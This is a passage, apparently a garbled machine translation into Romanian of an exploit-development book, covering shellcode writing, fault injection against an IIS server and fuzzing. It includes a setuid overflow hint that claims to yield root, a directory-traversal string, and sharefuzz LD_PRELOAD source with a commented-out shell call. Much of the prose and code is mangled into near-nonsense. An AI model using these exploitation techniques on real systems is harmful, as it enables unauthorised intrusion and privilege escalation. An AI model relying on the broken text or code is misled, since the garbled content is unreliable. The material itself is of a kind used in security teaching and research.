html Optimizare proces dezvoltare implementate cod Scris al tău primul exploata fără îndoială va fi dificil și obosi gel nym De măsura acumulare experienţă tu învăța ontimsnrova i b variat toci stare de urgență, și aceasta este va permite sokra ngg timp între descoperire ,'iefekil și creare Oi unsprezece imizarea proces dezvoltare implementate cod nou exploata LA acest secțiune noi sa incercam Compune un scurt și beat management pe optimizare dezvoltare Desigur, Cel mai bun cale accelera dezvoltare — în general treci bine fără implementate cod și utilizare în loc de -l sistemică funcţie sau proletariatul (proglet) Tem nu Mai puțin, în cel mai cazuri simplu static solutii implementa-i și mai simplu Total, asa de hai sa Hai să vorbim despre volum, Cum lor optimiza și ponyit gh lor calitate Planificare Inainte de Cum grăbiți-vă pe scris cod, de dorit Compune solid plan /eyeiegviy pe exploatare vulnerabilități LA caz cel mai simplu revărsare și (Verifica pe platformă Windows plan poate să arate ca Asa de (în dependențe din stiu, Cum personal tu vine sus la decizie astfel de drăguț sarcini): eu Definiție părtinire octeți care suprascrie adresa întoarcere ? Definiție Locație cod pe relație la registre (Nu indica dacă Inregistreaza-te ESP pe al nostru tampon? ȘI alte registre?) eu Căutare potrivit comenzi jmp/caii pentru specific versiuni produs sau diferit versiuni Windows și actualizări Serviciu Rask Creare mic Test implementate cod pentru verificări posibil neajunsuri iulie limitări sunt găsite în Codul introdus comenzi jmp pentru ocolire incorect fragmente incorporat asamblator eu In absenta scriptura exploata pe incorporat asamblator salvează masa timp LA cel mai publicat deciziilor sunt date obscur secvente hexazecimal octeți codificat în formă şir constante limba DIN aceasta complică ta sarcină, dacă dintr-o dată o sa ai nevoie introduce comanda jmp pentru ocolire deteriorat părți grămadă sau realizarea simplu modificări Încerca utilizare în loc de C-constant desene Următorul drăguț (dat Codul pentru Vizual C++, pe asemănătoare metodologie lucru /i yui gcc): (har *splo t() ( asm { Întoarcere adrese start cod jmp get sploit eu 'a mancat tu complet ţintă proces, repornește dacă el? Dacă repornește, apel funcţie Ieșire(), ExitProcess() sau TerminateProcess() în Windows • i Neli tu complet ţintă program curgere, repornește dacă el? Dacă repornește, apel funcţie ExitThread() sau TerminateThread() shii un alt echivalent funcţie Acest metodă foarte Bun lucru la exploatare vulnerabilități DBMS, deoarece ce ei de obicei a sustine piscine muncitorii curge (în în special aceasta este se aplică la Oracol și SQL Server) ■ > Dacă tu utilizare revărsare în morman, poate sa dacă restabili buchet? O sarcină nu din simplu, dar în carte este dată rând util recomandări LA in ceea ce priveste recuperare interceptat management disponibil rând al- K'rpativ: •> Manipulatorii excepții Tine minte bun regulă: mai simplu Total scrie acea Codul, care scrie nu necesar Pentru start cheltuieli verifica manipulatorii excepții Dacă ţintă proces deja are cu drepturi depline manipulator, care execută toate final actiuni și efectueaza repornire, De ce ar nu apel a lui direct sau la Ajutor provocat exceptii? ) Recuperare grămadă și întoarcere la mamă Acest metodă nu din simplu — probabil, în grămadă prezent informație, care nu a reusi a primi simplu căutare în memorie Tem nu Mai puțin, în niste situatii el disponibil A lui avantaj este în volum, ce el in stare garanție absenta scurgeri resurse Tu găsi părți grămadă, suprascris la interceptare management, întoarcere lor fost valorile și do comanda ret Apel strămoş LA caz extrem nevoie poate sa pur şi simplu apel procedură, situat superior în lanţ apeluri, de exemplu, procedură capitole nou curgere LA niste aplicatii astfel de recepţie amenda lucru Defect — probabilitate scurgeri resurse (prize, memorie, fişier identificatori), care mai tarziu poate pauză stabilitate muncă programe Capitol Formare lucru medii Stabilitate Când implementate Codul va functiona cheltuieli cere tu niste întrebări koto secară Ajutor defini, trebuie sa dacă continua muncă și încerca do ri schenie Mai mult grajd ta scop trebuie sa a fi cu drepturi depline solutii lucru în orice mediu inconjurator și nu afectând pe ţintă gazdă contingență temporar tu manieră aceasta nu numai sănătos "pe general considerații”, n( și va ajuta a tăia general timp dezvoltare Dacă tu Bun face față Cu ra amândoi Cu primul ori, pentru tine nu Trebuie să în mod constant întoarce-te la program la apariția un alt Probleme Poate, tu vrei aprinde în acest listă niste proprii voch prosov despre Poate sa dacă alerga ta exploata pe gazdă Mai mult unu ori? despre Dacă proiecta exploata în formă scenariu și repetat alerga a lui n| unu gazdă, întâmpla dacă eșec pe niste etan? De ce? despre Poate sa dacă alerga niste copii exploata pe unu gazdă in acelasi timp dreapta? despre Dacă decizie destinat pentru platforme ferestre, va fi dacă aceasta muncă hoţ în toate versiuni sisteme și actualizări Serviciu Rusk? despre Lucru dacă exploata în alții OS familii Windows? NT/ /XP/ ? despre Dacă exploata scris pentru linux, va fi dacă el muncă în diferit distribuitor* tiwah? despre Trebuie sa dacă utilizatorii introduce părtinire pentru A merge, la Codul a lucrat?! Dacă Da, Poate, pentru tine cheltuieli greu codifica trusa decalaje pentru calc extensiv platforme și oferi utilizator posibilitate Selectați armată lor pe uşor memorabil nume Sau Mai mult mai bine: se angajează ta* kuyu metodologie, la care Codul în mai puțin grad depindea ar din specific platforme (de exemplu, a primi adrese LoadLibrary și GetProcAddress din RE- pentru^ cap în ferestre, mergi în jur particularități specific distributii* linux) despre Ce se va întâmpla dacă pe ţintă gazdă lucru Bun personalizat firewall? Nu va conduce dacă ta exploata la "planare" ţintă demon, dacă trusa reguli IPTables sau (în ferestre) IPSec va bloca conexiune? despre LA ce reviste va rămâne urme activitate al tău exploata, și este interzis dacă aceste urme mătura? Interceptare conexiuni Dacă tu exploata defect în la distanta modul (A dacă Nu, apoi De ce?), mai bine utilizare de bază conexiune repetat (pentru alții obiective), Aici niste recomandari: despre Instalare Control puncte în major funcții prize — Accept, ges, primit de la, trimite, Trimite catre — și uite, Unde stocate identificator soknі A scoate in evidenta identificator în a lui implementate cod n іісік>/іълуі'гіе a lui Vo i Rezultate poate sa, pentru acest Trebuie să se angajează beton părtinire în grămadă sau profită metodă "stare brută putere", provocând funcţie getpeername pentru definiții priză, Cu care tu interacționa • > LA Windows la fel cheltuieli instalare Control puncte în Citiți fișierul și WnteFile, iak Cum aceste funcții uneori sunt utilizate Cu prize • i G s/ip tu nu poseda monopol acces la priză nu Renunța Defini- divide, Cum sincronizate acces la priză și încerca a executa necesar actiuni pe cont propriu De exemplu, în Windows ţintă proces, probabil, utilizări eveniment, semafor, mutex sau critic secțiune LA primul Trei cazuri software fluxuri, mai repede Total, voi apel WaitForSingleObject(Ex ) sau WaitForMultipleObjects(Ex ), A în ultimul caz opp trebuie sa apel Introduceți secțiunea critică În toate enumerate cazuri nu-s /k* definiții identificator (sau critic secțiuni), pe cine aştepta Toata lumea odihnă, tu poti aștepta a lui cozile și corect tapet-i ps Cu alții cursuri Rezultate LA noii capitol prezentat utilitati, fișiere și programe, folosit hackeri La fel în a ei menționat niste util articole, gratuit distributie iritabil în Internet CAPITOL unsprezece Aplicație greșeli Tehnologii realizarea greșeli (vină injecţie) deja Mai mult o jumătate de secol aplica pentru verificări toleranta la greseli hardware dispozitive: mecanica mașini, motoare aeronave și chiar Incalzi elemente aparate de cafea LA astfel de sisteme pentru realizarea greșeli sunt utilizate contacte microcipuri, electromagnetic impulsuri, leagăne stres, A uneori chiar radiatii LA Paşă zile Toata lumea mare producatori echipamente în proces testarea implica acestea sau alte soiuri sisteme realizarea erori De măsura tranziție din analogic tehnologii la digital volum folosit software asigura creştere pe exponent Apare rezonabil întrebare: ce fel exista fonduri verificări fiabilitate programe? LA curgere ultimul decenii a fost dezvoltat rând tehnologii realizarea greșeli pentru identificarea serios Probleme în comercial program produse Mulți din aceste program sisteme au fost creată pe fonduri mai multe cercetare proiecte, sponsori care au fost Control maritim cercetare (birou de Naval cercetare, ONR), Control promițătoare cercetare programe (Apărare Avansat Cercetare proiect vârstă, DARPA), Naţional științific fond (Naţional Scince Fundație, NSF) și companie DEC (Digital Echipamente Corporație) Software sisteme realizarea greșeli — astfel de, Cum DEPINDE, DOCTOR, xcption, FERRARI, AMENDA, pumn, orchestră, MENDOSUL și ProFI — demonstrat ce tehnologii realizarea greșeli permite cu succes dezvălui variat limitări comercial programe La în curs de dezvoltare niste din enumerate tehnologii persecutat unu poartă — oferi comunitate dezvoltatori fonduri pentru verificări toleranta la greseli program produse Numai puţini solutii în public și privat sectoare dezvoltat special pentru căutare defecte Securitate în program produse Dar în contemporan lume Securitate Cu fiecare dupa amiaza joacă Toata lumea Mai mult important rol, asa de și nevoie în tehnologii, furnizarea a ei promovare în program produse, în mod constant creste Specialiști pe asigurând calitate (Calitate asigurare, QA) utilizare fonduri verificări oi stabilitatea carcasei în a lui in fiecare zi muncă pentru căutare potenţial slab locuri unu din cel mai util aptitudini la specialişti astfel de drăguț este pricepere integra fonduri automatizare în A mea unelte Specialist dar Securitate software asigura lună- Arhitectură la fel a sti mulți util din contemporan tehnologii asigura calitate Cel mai talentat se bazează pe metode manual analiză (în primul întoarce - - aceasta este reconstrucţie și analiză iniţială texte) pentru identificarea potenţial Probleme Securitate în program produse In orice caz, la toate utilitate, dacă nu obligaţie, aceste aptitudini pentru calificat specialist, pricepere aplica automatizate tehnologii de asemenea joacă foarte important rol Folosind cunoştinţe, primit pe etape reconstrucţie, analist poate repede ton a lui Apendice pentru automat tes- іproveniya, pa el va fi studiu alții treburile Astfel de "multifunctional" permite analiștilor suficient repede îndeplini muncă sute dacă nu mie specialişti unu din cel mai cel mai bun aspecte verificări toleranta la greseli este în volum, ce fiecare eroare, admis pa etape dezvoltare solutii, poate promova succes testarea Dacă ar tu s-a ridicat la listă toate pro- iframe greșeli, admis tu pe orice lungă interval timp A apoi construit Test pentru fiecare greșeli în Test aplicare, apoi apoi pentru tine fără Probleme a reușit ar hack majoritate comercial Server program produse Scris programe, fondat pe tehnologii realizarea greșeli, stimulează studiu clase atacuri inainte de astfel de adâncimi, ce tu start a intelege lor pe yurazdo Mai mult simplu nivel DIN fiecare nou clasă atacuri (studiat sau descoperit de sine heliu) tu învăța nou trucuri și metode, care Ajutor a intelege în alții clase ȘI cel mai placut — automatizare permite găsi căscată goluri în protecţie în apoi timp, pa tu paşnic dormi LA acest capitol noi vom proiecta și implementează program realizarea greșeli pentru căutare defecte Securitate în reţea Server program produse pe baza protocoale aplicat nivel Acest sistem, care noi Hai sa sunăm revoltă, Are mulți general Cu sistem, proiectat în ianuarie G și folosit pentru identificarea mulți cunoscut nyh vulnerabilități — astfel de Cum vulnerabilități folosit virus Cod roșu La demonstra eficienţă sisteme revoltă, noi Cu a ei Ajutor sa incercam dezvălui niste defecte Securitate în Microsoft Internei informație Server (IIS) Arhitectură Principal Componente al nostru sisteme realizarea greșeli afișate pe orez Prezentat logic structura caracteristică pentru mulți sisteme astfel de drăguț LA acest capitol noi detaliu considera fiecare din componente, A după uni Toata lumea Componente și hai sa construim REVOLTA Generator intrare date Exista variat moduri Colectie intrare date al nostru sisteme LA acest secțiune menționat niste din lor, dar, Cum tu curând asigurați-vă că acest listă departe nu deplin Intrare date poate sa acțiune pa serie teste Volum Capitol unsprezece Aplicație greșeli Model realizarea eșecuri REVOLTA Folosind analizor pachete, intercepta client reţea trafic în proces expediere pe retelelor pe Server Client program Analist alege serie intrare date din salvat pachete și transmite lor mecanism realizarea eșecuri pe Server Analist V patru Aplicație eșecuri în salvat client intrare și difuzat date Server programatic pachet Server program schimb valutar date între client și Server Noi generăm reţea trafic, interacționând Cu Server din client software pachet La fel de regulă interacţiune client Cu Server efectuate pe asa de reţea protocoale Cum NTTR, smtp, ftp, IMAR și POP cinci Folosind modul urmărire eșecuri, intercepta excepții, generate în ţintă program Orez Model realizarea greșeli REVOLTA și tip date a determina ce fel teste voi să fie efectuate Cu aceste date ! Cu toate că Colectie intrare date poate efectuate indiferent din lor tip, ef-j eficienţă identificarea defecte în ţintă program vizibil crește la; transfer intrare date, folosit pentru interacțiuni Cu ezoteric și netestată funcții programe LA al nostru exemple Atenţie va fi concentrat pe intrare date aplicat protocol Colectie intrare date va incepe Cu conservare reţea trafic sesiuni browser pe într-adevăr lucru server web Presupune la monitorizarea trafic în local retelelor a fost salvat Următorul client Anchetă: OBȚINE /căutare da group=kuroto&q=r ot HTTP/ Accept */* Accept-Limba ro-noi Acceptați codificarea gzip, dezumfla Agent utilizator Mozilla/ Gazdă- conexiune Ține în viață prăjitură ASPSESSIONISQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG Orice, OMS deşi Puțin intelege în protocol NNTR, va observa ce ida nu este standard extensie fişier După deținere mic cercetare în motor de căutare sistem se dovedește ce aceasta este extensie este parte rău documentat instrument, acces la la care efectuate prin filtru ISAPI, instalabil co mulți versiuni server web IIS Arhitectură NOTĂ - - Dacă tu confruntat Cu obscur și dificil în utilizare instrument-iom — față tu excelent punct de start punct pentru căutare Probleme Securitate Dacă pentru tine pare, ce acest instrument nu corespunde funcţionalitate pro-i rame în în general, mai repede Total, dezvoltatori și testeri a reactionat la -l exact iak la fel LED fragment transmise componentă al nostru Test aplicatii, i iii realizarea erori Acest componentă modifică intrare date, inclusiv în lor invalid sau neprevăzut simboluri Gamă condus teste în semnificativ grad depinde Cum din specificul intrare cuve, transmise componentă Asa de și din lor calitate Dacă transmite absolut invalid intrare date, apoi mare parte timp va fi po-irachena pe analiză funcții prelucrare greșeli în ţintă aplicare, asa de nu milă timp pe atent selecţie intrare date LA dependențe din obsma intrare date uneori cheltuieli la fel manual verifica lor calitate față start scară completă testarea Exista variat metode Colectie intrare date, transmise sistem realizarea erori Selectat metodă (sau combinaţie metode) depinde din iiipa condus teste Manual intrare Manual intrare intrare date cere mare cheltuieli timp, • dar de obicei prevede cel mai bun rezultate Intrare date creată în editor, la resturi fiecare Test conservat în director în formă separa fişier LA program se aprinde simplu funcţie, care se uită prin catalog și încărcături fiecare Test, după ce alternativ transmite teste componentă realizarea erori LA în special exact acest metodă folosit în sistem REVOLTA Cu exceptia A merge, salvat intrare date poate sa aduceți în baza date sau aprinde lor direct în Apendice Depozitare date în fişier livrează ne din bătaie de cap Cu clădire de specialitate structurilor date pentru lor comanda, depozitare informație despre dimensiuni și prelucrare Automat generatoare /(la simplu protocoale (astfel de Cum HTTP) intrare date Mai fi generat automat Pentru acest suficient a analiza protocol n proiecta algoritm, generatoare potenţial intrare date Generaţie intrare date mai ales sănătos în situatii când necesar a analiza variat aspecte ale comportament Protocol dar introduce date manual ineficient Practic experienţă a aratat ce automat generate intrare date Bun potrivi pentru simplu protocoale Cu foarte de încredere structura (de exemplu, pentru majoritate aplicat protocoale) La muncă Cu protocoale în mai mare grad dinamic, posedând mai multe niveluri și state, automat generatoare se dovedește suboptimal Eroare în generate date poate Capitol unsprezece Aplicație greșeli apare numai mai tarziu niste ore după start testarea Dacă w| nu veți temeinic Verifica date în proces generaţie, problemă va rămâne neobservat Operațional conservare niste sisteme (astfel de, Cum ORCHESTRĂ) permite aduceți greșeli direct în proces interacțiuni Acest metodă extrem efectiv! la testarea dificil protocoale Cu a sustine state A lui singura dezavantaj este necesitate descrieri Protocol la introdus schimbări garantat de succes livrare De exemplu, Cu Schimbare] mărimea câmpuri date interior protocol mesaje pentru tine, Poate, la fel Trebuie să în în conformitate Cu contribuit schimbări Actualizați variat câmpuri Cu date despre dimensiuni LA în special dezvoltatori ORCHESTRĂ folosit protocol prize (protocol cioturi) pentru definiții necesar caracteristici protocoale Generaţie zgomot LA Sfârşit anii — din timp anii ani Trei oameni de știință — barton Miller (Barton Miller) Lars Fredriksen (Lars Fredriksen și Brian Asa de (Vguap asa de) — explorat durabilitate muncă standard programe comanda linii UNIX Od- ADĂUGA EEAX-+-OFOO O ] CH Continuare da/nu* LA listare dat exemplu excepții, salvat FaultMon în timp testarea REVOLTA LA comanda linia a fost dat cheie interactiv re^ presă pe bancă -eu, permițând do pauză între excepții și a analiza condiție programe Toata lumea împreună Pe site-ul www wiley com/compbooks/koziol plasat iniţială textele și otkomІ tăiate versiune sisteme realizarea greșeli REVOLTA La vedea pro* gram REVOLTA în acțiune, copie REVOLTA și FaultMon în pliant pe a lui com piotere Noi Fă-o exemplar Test Cu folosind intrare date, citat anterior în acest capitol: GE /căutare da?group=kuroto&q=r ot HTTP/ Accept */* Accept-Limba ro-noi Acceptați codificarea gzip, dezumfla Agent utilizator Mozilla/ O Gazdă Conectare Ține în viață prăjitură ASPSESSIONISQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG Test deja creată și gata la muncă, introduce a lui din nou nu trebuie sa Alerga Două instanță comanda procesor (cmd exe) Primul copie ar trebui să să fie efectuate pe calculator Cu potenţial vulnerabil server web, care tu vreau să Test Alerga pe limba germana FaultMon și introduce identificator proces server web, lucru în fundal modul LA caz IIS ar trebui să utilizare identificator proces inetinfo exe Sa spunem dacă identificator proces egală apoi în iriіlashenip comanda procesor introdus Următorul comanda: faultmon executabil? i Rezultate La lansare FaultMon afișat întreg serie evenimente Nu a plati pe nimeni Atenţie — ei conectat Cu initializare FaultMon și nu avea relaţie la testarea Când FaultMon va functiona și va incepe ieșire informație despre evenimente, alerga un alt comanda CPU pe calculator, Cu ko-yuroyu produs atac Vyuroіi instanță ar trebui să a fi deschis pe calculator, Unde dislocat sistem REVOLTA În al doilea comanda procesor alerga REVOLTA și introduce adresa IP studiat hosta și cameră port, pe la care efectueaza ascultare ik' Server Sa spunem dacă server web lucru sub abordare , A ascultare efectuate pe port , comanda arata Asa de: G iot executabil -R F iiily, inclus în configurație revoltă, permite pentru tine din nou găsi o singura data- vulnerabilități legate de Cu revărsare tampon, deja descoperit în major servere web Poate, la testarea servere Microsoft Windows Cu din timp actualizări Serviciu Rusk pentru tine chiar a reusi din nou descoperi defect, asa de cu succes folosit vierme Cod roșu Fiecare fişier în pliant conţine intrare date pentru specific Test REVOLTA începe Cu Test și crește cameră inainte de acestea de cand, pa nu voi rezolvat Toata lumea issgy Tu poti Editați | × aceste fișiere și crea nou teste dar a lui discreție La fel în livra inclus original text programe, pa bază la alte tu poti construi proprii sistem Fericit vânătoare! Rezultate LA agoie capitol considerată concept realizarea greșeli, având direct cі venos atitudine la metodologie fuzzing Proces realizarea greșeli demonstrat pe exemplu nou aplicatii revoltă, A pentru monitorizarea rezultate în ţintă aplicarea aplicat program Faultmon CAPITOL Artă fuzzing Sub termen fuzzing (fuz) uni actiuni, însoțitor dezvăluie^| leniya majoritate defecte Securitate Cu toate că în academic cercetare^ niyakh universitate nivel Atenţie de obicei se dovedește concentrat pe "oficial demonstrabil" de protecţie metode, majoritate specialişti-^ practicieni preferă metode, furnizarea rapid și efectiv re^ rezultat LA acest capitol voi considerată instrumente și metodologie căutare defecte In orice caz, ar trebui să tine minte, ce în ciuda pe Toata lumea cercetare în despre* durabil analiză vulnerabilitati, copleșitoare majoritate defecte sunt detectate* mulțumită coincidență circumstanțe și mult noroc LA acest capitol tu descoperi Cum deveni norocos General teorie fuzzing unu din metode fuzzing bazat pe realizarea greșeli (acest subiect complet' dedicat capitol unsprezece) LA lume Securitate software asigura aplicare, greșeli de obicei implică transfer aplicarea "rasfatat" date, pe Verifica manipulare Cu variat provocări funcții API, Cum regulă Cu folosind depanator sau interceptor apeluri bibliotecă functii, De exemplu, poate sa la intamplare forta funcţie liber() întoarcere NUL (caracteristică eșecuri) sau la toata lumea apel getenv() a se intoarce lung linia LA cel mai articole și cărți pe acest subiect a oferit a analiza performant fişier și implementează în -l ipotetic anomalii LA Două cuvinte, aceste; anomalii face liber() întoarcere zero, după ce pe grafice Viena considerată statistic indicatori acest evoluții Întreg proces Are sens pentru hardware greșeli, În curs de desfășurare Aleatoriu manieră in orice caz acestea greșeli, care noi considera, prezent tu ce tot ceea ce, dar numai nu Aleatoriu evoluții LA context căutare defecte Securitate instrumental fonduri Joaca important rol, dar numai în combinate Cu calitate fuzzer Suficient limitat, dar efectiv exemplu fuzzing metodă realizarea greșeli dă general pentru Solaris și linux bibliotecă împărtășește fuzz (www immunitysec fagure), destinat pentru testarea tipic Opțiuni revărsare local tampoane în programe seluid De multe ori dacă pentru tine dai peste aproximativ astfel de recomandari: TERM=' -e 'prinţ "ȘI" X '' /setuid binar va da pentru tine rădăcină la- General teorie fuzzing iii /iegiii!”? Bibliotecă împărtășește fuzz a fost proiectat pentru A merge, la asemănătoare recomandări oţel redundant mulțumită complet automatizare proces căutare În mulți acest poartă a fost atins Deja pe primul săptămânal utilizare împărtășește fuzz a fost identificat vulnerabilitate libsldap so în solaris, despre care Asa de și nu raportat în Soare Mai tarziu informație despre vulnerabilități a fost publicat alții specialist pe Securitate Considera Codul programe sharefuzz, la mai bine a intelege principii a ei lucrări: /*sharefuzz Cu - fuzzer iniţial destinat pentru local fuzzing dar la fel Bun potrivit pentru toate felurile funcții clib LA cel mai sisteme ar trebui să cizme în modul LD PRELOAD LICENȚĂ: GPLv */ # include /* Definiții */ /*#defini DOLOCALE /* LOCAL FUZZING */ #defini MĂRIMEA /* Marimea întors mediu inconjurator */ tdefini FUZCHAR x /* Simbol pentru fuzz*/ static char *chestie static char *lucruri , static char afişa[] = "gazdă locală " /* Se intoarce pe cerere*/ static char calea meaQ] = „/usr/bin /usr/sbin /cos /sbin" static char ld preload[] = #include int Selectați (inf n fd set *readfds fd set *writefds fd set *cu excepția fds, struct timeval *pauză) ( printf("SELECT SUMAT!\n"), } int getuidO printfC^getuid'Xn") întoarcere int geteuid() printf("***geteuid\n") întoarcere } int getgidO printf ("getgid\n") întoarcere int getegidO { printf ("getegid\n"), întoarcere ZO Capitol Artă fuzzing int getgid O { printf ("***getgid \n"); întoarcere ; } int getegid () { printf ("***getegid \n"): întoarcere : } /* Fuzzing getenv - Schimbare în în conformitate Cu specific are nevoie */ char * getenv(car * mediu inconjurator) fprintf (stderr,"GETENV: %s\n" mediu); spălare (O); dacă (!strcmp(mediu,"DISPLAY") ) întoarcere afişa: #dacă #dacă dacă (! strcmp (mediu "CALEA")) G t întoarcere NUL întoarcere calea mea } #endif #dacă dacă (!strcmp(mediu "ACASĂ")) întoarcere „/acasă/dave” dacă (lstrcmp(mediu,"LD PRELOAD")) întoarcere NUL, dacă (!strcmp (mediu "LOGNAME")) întoarcere NUL; dacă (!strcmp(mediu "ORGMAIL")) { fprintf(stderr "ORGMAIL=%s\n",stuff ), întoarcere „ASDFASDFsd” dacă (!strcmp(mediu "TZ")) întoarcere NUL, #endif fprintf (stderr "continuare la întoarcere implicit\n") //somnd) /* Întoarcere NUL dacă mediu inconjurator nu trebuie sa fi distrus */ //întoarcere NUL /* Întoarcere chestie, dacă Cu fiecare variabil trebuie sa întoarce-te lung strict */ fflush(O) întoarcere chestie int putenv(char* şir) General teorie fuzzing { fprintf (stderr,"putenv %s\n" string); întoarcere , int clearenvO fprintf (stderr,"clearenv \n") întoarcere ; } int unsetenv(car * şir) fprintf(stderr unsetenv %s\n" șir) întoarcere init() chestii=malloc(SIZE) stuff =malloc(SIZE) printf("partajat bibliotecă încărcător lucrează\n") memset(lucruri FUZCHAR SIZE- ) chestii[SIZE-l]= memset(lucruri FUZCHAR SIZE- ): Lucruri [l]= //systemC'/bin/sh") } Program compilează în general bibliotecă și Se încarcă în modul LD PREÎNCĂRCARE (în sisteme, Unde el sprijinit) La Se încarcă împărtășește fuzz redefinește apel getenv() și mereu se intoarce lung linia Cu toate că fuzzsr împărtășește fuzz are foarte limitat oportunități, el clar demonstreaza mulți puternic și slab laturi Mai mult comise fuzzers (astfel de Cum SPIKE), care de asemenea considerată în acest capitol NOTĂ - - Dacă tu vreau să vedea "puțin lustruit" analogic împărtășește fuzz pentru aplicații Windows vizita site-ul Holopunte (www sisecure com/holodeck/) La fel de regulă fuzzeri, lucru pe principiu realizarea greșeli, interacționa Cu program pe prea mult primitiv nivel și în plan verificări Securitate nu aduce real beneficii Majoritate întrebări despre accesibilitate defecte rămâne fără răspunsuri în afară de A merge apare mulți Probleme Cu fals declanșatoare La acest unu numai licență Holopunte cheltuieli dolari — nu petrece bani degeaba Static analiză și fuzzing LA diferență din static analiză (sa spunem analiză binar fișiere sau iniţială texte), la identificarea defect Securitate la Ajutor fuzzer utilizator de obicei primeste trusa date, însoțitor detectare Capitol Artă fuzzing Sa spunem când în împărtășește fuzz merge mai departe de urgență completare proces, noi pe* raza imprima Cu indicând variabile mediu inconjurator, testat pe acea lu* poliţist, și exacte valori, care ar putea deveni cauză completare După acest poate sa verifica Toata lumea valorile manual și uite, care exact LED la eșec Static analiză de obicei dezvăluie numeroase defecte Singur din lor Mai folosit prin extern transmitere date aplicare, alte — Nu Proces, la care fiecare defect urmărite în timp sesiune static analiză Cu clarificare oportunități a lui real Operațiune, este interzis Nume eficient sau Bun scalabil DIN un alt mână, uneori fuzzer permite găsi rău reproductibilă defect bun exemplu servi defecte repetate eliberare memorie și alte defecte, pentru care trebuie sa întâmpla Două evoluții contracta Aici De ce majoritate fuzzers transmite al lor obiecte pseudo-aleatorie intrare date și permite utilizator a stabilit iniţială sens generator Aleatoriu numere Acest mecanism nu numai permite fuzzer extinde analizate spaţiu, dar și dă posibilitate în caz nevoie complet reproduce proces Scalabilitate fuzzing Static analiză — extrem complicat și muncă intensivă proces Deoarece la static analiză posibilitate real exploatare toata lumea specific defect nu verificat, cercetător cont pentru do aceasta este pe cont propriu Proces nu transportat pe alte stabilit copii programe, deoarece posibilitate exploatare defect poate depinde din mulți factori inclusiv configurație programe, Opțiuni compilator arhitectură calculator și t d Cu exceptia A merge, defect, care cu succes operate în unu versiuni programe, poate deveni absolut inaccesibil în un alt versiuni LA apoi la fel timp într-adevăr exploatat defect aproape inevitabil Oportunitati la încălcare acces sau un alt eșua, care poate sa descoperi hackeri de obicei nu interesat defecte, care imposibil exploata Prin urmare, ne Necesar exact fuzzer Noi apel fuzzing scalabil deoarece ce fuzzer, construit pentru testarea protocol smtp, va fi capabil Test orice număr SMTP- servere (sau configuratii unu Server); mai repede Total, la acest pe toate servere voi descoperit asemănătoare defecte Acest particularitate fuzzer-ra cu adevărat neprețuit la atacuri pe nou sisteme, furnizarea acestea la fel Servicii, ce și alte sisteme, fost obiecte atacuri în trecut Există și un alt cauză, pe care noi vorbind despre scalabilitate fuzzing: linia, potrivit pentru căutare defecte în unu Protocol mai repede Total voi arată ca pe linia, folosit pentru alții protocoale Pentru exemplu considera şir deplasare pe directoare, scris pe Piton: prinţ " /"* dezavantaje fuzzers Cu toate că acest linia servește pentru detectare defecte, permițând sarcină arbitrar fișiere Cu niste servere ea la fel dezvăluie foarte interesant defect în contemporan versiuni HelixServer (la fel celebru Cum Real Screener) Defect asemănătoare pe Următorul fragment cod c, care salvează uka- i;i geluri pe Toata lumea cataloage în tampon, stocate în grămadă: vold exemplu(){ ('har * ptrs[ ]: char * Cu; char **R, pentru (p=ptrs,c= nstring, *c!= c++) { Dacă (*c==*/') { *p=c; p++: } LA Sfârşit funcții ar trebui să a aparea trusa indicatoare pe Toata lumea niveluri director eu Io Asa de Cum număr tăieturi Mai mult , salvat indicator cadru și adresa întoarcere sunt înlocuite indicatoare pe al nostru linia Asa de în al nostru eliminarea se dovedește excelent vulnerabilitate, nu necesită aplicatii orice specific decalaje Cu exceptia A merge, aceasta este unu din acestea vulnerabilitati, care oferi posibilitate scrie implementate Codul, potrivit pentru orice arhitectură, Asa de Cum dat vulnerabilitate nu cere adrese întoarcere, A RealServer exista în versiuni pentru linux, Windows și FreeBSD Veli tu dezvolta nou fuzzer, nu a uita despre unu important etapă: întoarce-te la celebru vulnerabilități uite, descoperi dacă lor ta fuzzer, și încerca pe oportunități abstract A mea Test aceasta va permite pentru tine găsi în viitor necunoscut vulnerabilități A merge la fel "clasă" fără programare special teste, regizat pe lor provocare Specific cale abstractizare depinde din personal gust aceasta atașează Pentru fiecare fuzzer anumit individualitate, deoarece a lui Componente abstractizată pa diferit niveluri ce parţial afectează pe rezultate dezavantaje fuzzers Poate, tu deja hotărât, ce fuzzers — cel mai minunat invenţie după de pâine în feliere, dar și la lor mânca al lor limitări hai sa considera niste din lor De exemplu, fuzzer va fi capabil găsi departe pe fiecare defect, care iese la iveală prin static analiză Considera Următorul fragment: dacă (!strcmp(userinputl „ ”)) strcpy(buffer userinput ) Pentru implementare acest defect variabil userinputl trebuie sa a fi atribuit niste linia (cunoscut autorii Protocol dar nu al nostru fuzzer), A pix Capitol Artă fuzzing variabil userinput trebuie sa conține foarte lung linia Asa de modul în care Două factorul a a se dovedi pentru defect semnificativ: Specific sens userinputl Lung linia în userinput Pentru certitudine presupune ce program este tu SMTP- Server Cu a sustine comenzi NEYU, EHLO și IAD Poate, niste defecte muncă numai apoi, când Server vede comanda IAD — aceasta este nedocumentat posibilitate, folosit numai al nostru Server SMTP Chiar dacă presupune ce fuzzer conţine listă special linii, pe măsura adaosuri nou factori complexitate proces începe crește pe exponent Asa de, bun fuzzer conţine listă linii, care el ar trebui să încercați Asa de modul în care pentru fiecare variabil, participarea în fuzz, verificat N linii Dacă trebuie sa să fie luate în considerare un alt variabil, număr combinatii crește inainte de N*M, și t d (pentru fuzzer întreg este mic de statura binar linia) De obicei aceste Două principal puncte slabe fuzzers compensate pe Verifica static analiză sau binar analiză ţintă programe pe etape execuţie Aceste metode crește fiabilitate și a contribui Identificare defecte, rămas ascuns la tradiţional fuzzing La cunoștință Cu diferit fuzzers tu vei vedea ce la lor Sunt al lor specific limitări Poate, aceasta este parţial condiţionat lor de bază arhitectură, de exemplu, Codul fuzzer SPIKE în semnificativ măsura scris pe limba DIN și nu este orientat pe obiect La fel poate descoperi ce niste vizate programe rău potrivi pentru fuzzing — ei foarte încet muncă sau de urgență ajuns la capăt la orice abaterile introdus date din norme, ce complică Căutare folosit defecte pe fundal nenumărat greșeli (din exemple pa minte vino e-mail și rpc ttdbserverd) ȘI poate a fi, se dovedește ce protocol prea mult dificil descifra dar date trasarea retelelor La din fericire astfel de cazuri întâlni suficient rar Modelare arbitrar reţea protocoale hai sa scurt sa plecam fuzzers pentru gazde Vulnerabilități gazde (la fel numit local) util pentru identificarea niste de bază proprietăți fuzzeri, dar utilizare din lor 